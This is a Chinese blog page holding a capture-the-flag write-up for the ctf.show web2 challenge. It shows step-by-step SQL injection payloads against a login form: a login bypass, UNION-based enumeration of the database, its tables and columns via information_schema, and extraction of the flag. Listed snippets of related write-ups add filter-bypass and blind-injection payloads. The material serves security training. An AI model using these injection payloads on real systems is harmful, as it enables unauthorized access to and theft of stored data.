ctf.show_web2-爱代码爱编程

2022-05-11 分类: 安全网络安全 web安全 ctf靶场 ctfshow靶场

题目：

<html lang="zh-CN">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />
    <title>ctf.show_web2</title>
</head>
<body>
    <center>
    <h2>ctf.show_web2</h2>
    <hr>

        <form method="post">
        用户名:<input type="text" name="username"><br><br>
        密&nbsp;&nbsp;&nbsp;码:<input type="password" name="password"><br><br>
        <input type="submit" value="登陆">
        
    </form>
    </center>

</body>
</html>

解题思路：

题目是登陆框，猜测是SQL注入。先对万能密码尝试

password=1&username=1' or true #

![image.png](https://img-blog.csdnimg.cn/img_convert/961171a0a4ead9652e3530259af2aee0.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u6770cdf5&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=86480&status=done&style=none&taskId=u56a08447-d029-4923-ba8b-1954db4bd80&title=&width=1536)
果然存在SQL注入，但是没有flag回显。可能考点并非万能登陆，而是flag存放在数据库里。接下来爆一下ctfshow的占位符是几

password=1&username=1' union select 1,2,3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/ed694841fc883983c27f437e58c1e39a.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u12714eba&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=95716&status=done&style=none&taskId=uad8d60f3-e8af-4bcb-b464-42b32718285&title=&width=1536)
已知占位符是2，开始爆数据库库名

password=1&username=1' union select 1,database(),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/92d62a8a6b94795df2b2b22a83966de9.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u1caacf13&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=98153&status=done&style=none&taskId=u4a5b2657-60ba-40db-adcc-a7e1e711057&title=&width=1536)
已知数据库库名为web2，继续爆数据库表

password=1&username=1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/53cdd1a0c1592749d445433f06773836.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u1204504f&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=105918&status=done&style=none&taskId=u823803b9-9fc4-4660-b922-e6e7b7a92ec&title=&width=1536)
当前已知表名是flag和user这两个表，很有可能flag在flag表中或者flag在flag表的字段里。继续爆字段

以下两种payload均可

password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='flag' #

password=2&username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() #

![image.png](https://img-blog.csdnimg.cn/img_convert/dbc88ee2e05d2acc04c50a08386a358c.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=uf2152f2a&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=102001&status=done&style=none&taskId=u18486a51-ecfa-4d1c-b3da-163a9ee5ffc&title=&width=1536)
之前一直没找到flag，flag也许就藏在表内容里了。最后爆出flag表中的内容

以下两种payload均可
password=2&username=1' union select 1,(select * from flag),3 #
password=2&username=1' union select 1,(select flag from flag),3 #

![image.png](https://img-blog.csdnimg.cn/img_convert/89721a792d68ffb83f85d00186edfe15.png#clientId=u785b03a8-7954-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=732&id=u4324edfa&margin=[object Object]&name=image.png&originHeight=915&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=94195&status=done&style=none&taskId=u0ba82ce0-ffd6-481f-be07-9ca3815a7d2&title=&width=1536)
获得题目flag为：ctfshow{1aefca01-afd4-4527-a35b-c5a8be893ae0}

本文链接：https://blog.csdn.net/liyuwei888/article/details/124705014

ctf.show web2 最简单的SQL注入-爱代码爱编程

2020-07-12 标签: web安全分类: ctfshow web

ctf.show web2 最简单的SQL注入 1、一开始的页面随便输入用户名和密码看它怎么反应没报错，只是清空了用户名和密码题目提示是sql注入，那就用burpsuit抓个包，发送到repeater点击go既然是登录的页面，那就用万能密码 ’ or 1=1 #，出现欢迎您，ctfshow，说明登录成功,这里得说明一下username=admin’

ROSE笔记-ctf.show_web2-WP-爱代码爱编程

2020-11-05 分类: ctf记录

ctf.show_web2-WP 直接是一个登录界面，在用户名处输入万能密码 admin' or 1=1 # 显示了登陆信息，现在就是去找回显位置。用order by判断当前查询的列数，order by 4的时候登陆信息消失，而order by 3的时候存在登陆信息。至此，判断回显位置 admin' or 1=1 union select 1

ROSE笔记-ctf.show_web7-WP-爱代码爱编程

2020-11-06 分类: ctf记录

ctf.show_web7 使用盲注 payload: /?id=1’ or 1=1# 发现过滤了空格所以报错用//替换空格 payload: /?id=1’//or/**/1=1#此时页面正常显示接下来就是查库、查表、查字段查到显示位置 ?id=1%27/**/or/**/1=1/**/union/**/select/**/1,2,3#

ROSE笔记-ctf.show_web6-WP-爱代码爱编程

2020-11-06 分类: ctf记录

ctf.show_web6 直接输入 admin' or 1=1# 显示错误，说明过滤了空格所以用户名处把空格替换为/**/后输入 admin'/**/or/**/1=1# 开始 admin'/**/or/**/1=1/**/order/**/by/**/3# admin'/**/or/**/1=1/**/union/**/select

CTF.show：WEB：web签到题-web4-爱代码爱编程

2021-01-12 分类: ctf_web_writ ctf.show

ctf.show做题记录 web签到题web2web3web4 web签到题查看源码得到flag web2 手抖点到hint索性直接全抄 1.查当前数据库名称 ' or 1=1 union select 1,database(),3 limit 1,2;#-- 得到数据库名称web2 2.查看数据库表的数量 ' or 1

CTF.show：web6-爱代码爱编程

2021-01-15 分类: ctf_web_writ ctf.show

登陆窗，先想到sql注入抓包测试发现失败利用/**/代替空格进行绕过 username=admin'/**/or/**/1=1#&password=123456 利用联合查询找到回显位置 username=admin'/**/or/**/1=1/**/union/**/select/**/1,2,3#&password=1

CTF.show：web7-web8-爱代码爱编程

2021-01-15 分类: ctf_web_writ ctf.show

web7 这题是一题盲注题，对url进行盲注测试从网上找到的师傅的爆表名脚本 import requests url = "http://1060cceb-f9ef-4fb3-b273-034c74a0bd38.chall.ctf.show/index.php?id=-1'/**/" def db(url): # 爆库名 for i

CTF.show：web9-爱代码爱编程

2021-01-15 分类: ctf_web_writ ctf.show

打开题目发现有注入框，简单的注入测试后发现没有效果，扫描一下，发现存在robots.txt 进入robots.txt查看文件下载后打开发现有源代码 <?php $flag=""; $password=$_POST['password']; if(strlen($password)>10){ die("passw

CTF.show：web13-爱代码爱编程

2021-01-15 分类: ctf_web_writ ctf.show

扫描后发现存在upload.php.bak .bak文件是备份文件。这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏 .phps .bak结尾的网页 <?php header("content-type:text/html;charset=utf-8"); $filename = $

CTF.show：web14-爱代码爱编程

2021-01-16 分类: ctf_web_writ ctf.show

打开来后执行语句得到提示 ?c=3 当c为3时，不会退出循环，进而执行下一个case语句得到urlhere_1s_your_f1ag.php 进入之后发现是一道注入题目查看源代码发现存在提示 if(preg_match('/information_schema\.tables|information_schema\.columns|linestr

ctf.show_web11-爱代码爱编程

2021-02-17 分类: PHP ctfshow

源码： <?php function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,""

ctf.show_web12-爱代码爱编程

2021-02-17 分类: ctfshow

f12提示：  传参?cmd=hightlight_file(“index.php”); 得到源码： <?php error_reporting(0); ?> <html lang="zh-CN"> <head> <meta http-equiv="

ctf.show_web4-爱代码爱编程

2021-12-15 分类: PHP 安全 ctf web安全

查看题目发现题目要求get请求传输一个url参数，并且看到了include，估计需要使用伪协议进行包含，进行尝试 http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=php://input 发现报错error，继续尝试其他协议发现都显示error 尝试直接在后面

ctf.show web入门-爱代码爱编程

2022-01-21 分类: 前端

目录信息收集 web1:【where is flag】 web2:【无法查看源代码】 web3:【where is flag】 web4:【robots】 web5:【phps文件泄露】 web6:【网站源码泄露】 web7:【git】 web8:【svn泄露】 web9:【vim缓存泄露】 web10:【cookie】